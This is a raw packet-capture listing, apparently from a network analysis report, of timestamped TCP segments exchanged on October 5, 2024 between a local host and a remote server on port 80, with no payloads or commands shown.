                                            Oct 5, 2024 14:36:18.210380077 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.210391045 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210407972 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210412025 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.210422993 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210438967 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210455894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210464954 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.210479975 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.210565090 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210581064 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210597038 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210617065 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210630894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210632086 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.210648060 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210664988 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.210670948 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.210695028 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.210710049 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.211087942 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.211107969 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.211127043 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.211148024 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.211148977 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.211194038 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291212082 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291233063 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291250944 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291306019 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291310072 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291325092 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291342020 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291357994 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291358948 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291376114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291382074 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291404963 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291438103 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291513920 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291529894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291555882 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291606903 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291623116 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291640043 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291654110 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291666031 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291677952 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291682005 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291724920 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291759014 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291778088 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291824102 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291930914 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291946888 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291964054 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291979074 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.291982889 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.291994095 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292011023 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292016029 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292026997 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292043924 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292049885 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292089939 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292246103 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292265892 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292285919 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292309999 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292393923 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292407990 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292423010 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292438030 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292448997 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292464018 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292478085 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292491913 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292495012 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292511940 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292511940 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292526960 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292542934 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292543888 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292560101 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292568922 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292574883 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292589903 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.292601109 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.292670012 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293104887 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293123007 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293138027 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293153048 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293167114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293174982 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293181896 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293195963 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293200016 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293215036 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293227911 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293230057 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293240070 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293256044 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293268919 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293271065 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293286085 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293297052 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293303013 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293314934 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293320894 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293343067 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293353081 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293363094 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293379068 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293617010 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293632030 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293648005 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293658018 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293684006 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293791056 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293807030 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293823957 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293845892 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293847084 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293862104 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293879032 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293891907 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293894053 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293910980 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293925047 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293925047 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293941021 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293953896 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293956995 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293979883 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.293983936 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.293998003 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294023037 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294425964 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294441938 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294459105 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294467926 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294473886 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294491053 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294496059 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294507980 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294524908 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294539928 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294576883 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294759035 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294773102 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294787884 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294804096 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294820070 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294833899 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294833899 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294850111 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294861078 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294874907 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294878960 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294889927 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294904947 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294918060 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294919968 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294934988 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294945955 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294953108 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294970036 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.294976950 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.294986010 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.295001984 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.295011044 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.295018911 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.295034885 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.295042992 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.295051098 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.295069933 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.295078039 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.295085907 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.295109034 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.296307087 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.296324015 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.296340942 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.296356916 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.296369076 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.296371937 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.296387911 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.296399117 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.296402931 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.296421051 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.296457052 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.335709095 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378196001 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378253937 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378277063 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378313065 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378314018 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378335953 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378355980 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378367901 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378376961 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378398895 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378403902 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378453970 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378499031 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378582001 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378601074 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378638983 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378640890 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378660917 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378680944 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378695965 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378700972 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378721952 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378731012 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378771067 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378861904 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378880978 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378901005 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378921032 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.378940105 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.378968954 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379021883 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379057884 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379089117 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379101992 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379108906 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379129887 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379151106 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379156113 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379170895 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379193068 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379194975 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379246950 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379484892 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379508018 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379528046 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379548073 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379556894 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379569054 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379590034 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379596949 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379611015 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379631042 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379636049 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379652977 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379673958 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379678965 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379698038 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379719973 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379719973 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379774094 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.379789114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379944086 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379964113 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.379991055 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380002975 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380028009 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380049944 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380053043 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380073071 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380098104 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380099058 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380155087 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380367994 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380388021 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380407095 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380425930 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380439043 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380441904 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380459070 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380475044 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380475998 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380491972 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380506992 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380508900 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380522013 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380537033 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380538940 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380554914 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380569935 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380570889 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380584955 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380597115 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380601883 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380616903 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380633116 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380644083 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380686998 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.380929947 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.380985975 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381144047 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381159067 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381185055 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381201029 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381217003 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381217003 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381232977 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381247997 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381249905 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381264925 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381275892 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381279945 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381295919 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381311893 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381313086 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381329060 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381335020 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381345987 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381362915 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381381035 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381386995 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381396055 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381414890 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381422997 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381443977 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381778955 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381803036 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381818056 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381825924 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381834984 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381850958 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381860971 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381865978 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381882906 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381896019 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381899118 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381917953 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.381931067 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.381968021 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.382145882 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382159948 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382177114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382230043 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.382319927 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382337093 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382352114 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382368088 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382375002 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.382385969 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382400990 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382406950 CEST4969980192.168.2.715.235.206.13
                                            Oct 5, 2024 14:36:18.382416010 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382431984 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382447004 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382462978 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382477999 CEST804969915.235.206.13192.168.2.7
                                            Oct 5, 2024 14:36:18.382482052 CEST4969980192.168.2.715.235.206.13
